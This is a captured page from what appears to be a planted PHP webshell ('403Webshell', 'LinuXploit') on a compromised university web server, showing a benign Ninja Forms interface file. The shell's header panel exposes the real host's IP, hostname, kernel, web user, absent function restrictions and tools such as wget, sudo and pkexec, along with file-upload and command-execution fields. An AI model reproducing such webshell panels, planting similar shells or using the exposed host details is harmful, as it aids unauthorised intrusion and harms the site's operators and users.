403Webshell
Server IP : 172.24.0.40  /  Your IP : 216.73.216.10
Web Server : Apache
System : Linux dbweb26.ust.edu.ph 4.18.0-513.5.1.el8_9.x86_64 #1 SMP Fri Sep 29 05:21:10 EDT 2023 x86_64
User : apache ( 48)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/tomas/public_html/wp-content/plugins/ninja-forms/includes/Interfaces/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tomas/public_html/wp-content/plugins/ninja-forms/includes/Interfaces/SotAction.php
<?php

namespace NinjaForms\Includes\Interfaces;

/**
 * Requirements for NF3 actions on WP 6.7+
 */
interface SotAction
{

    /**
     * Steps to perform when the action/form is saved
     *
     * @param array $actionSettings
     * @return array|void
     */
    public function save(array $actionSettings);

    /**
     * Steps to perform when the action is processed
     *
     * @param array $actionSettings
     * @param int $formId
     * @param array $data
     * @return array
     */
    public function process(array $actionSettings, int $formId, array $data): array;

    /**
     * Return the programmatic name  
     *
     * @return string
     */
    public function get_name(): string;

    /**
     * Return the human readable nicename  
     *
     * @return string
     */
    public function get_nicename(): string;

    /**
     * Return the drawer section
     *
     * @return string
     */
    public function get_section(): string;

    /**
     * Return the drawer group
     *
     * @return string
     */
    public function get_group(): string;

    /**
     * Return url of action's image
     *
     * @return string
     */
    public function get_image(): string;

    /**
     * Return url of documentation
     *
     * @return string
     */
    public function get_doc_url(): string;

    /**
     * Return settings
     *
     * Expected array
     * @return array
     */
    public function get_settings();

    /**
     * Return the timing position
     * 
     * Early = -1, Normal = 0, Late = 1
     * 
     * @return integer
     */
    public function get_timing(): int;

    /**
     * Return the priority for the action.
     *
     * @return integer
     */
    public function get_priority(): int;
}

Youez - 2016 - github.com/yon3zu
LinuXploit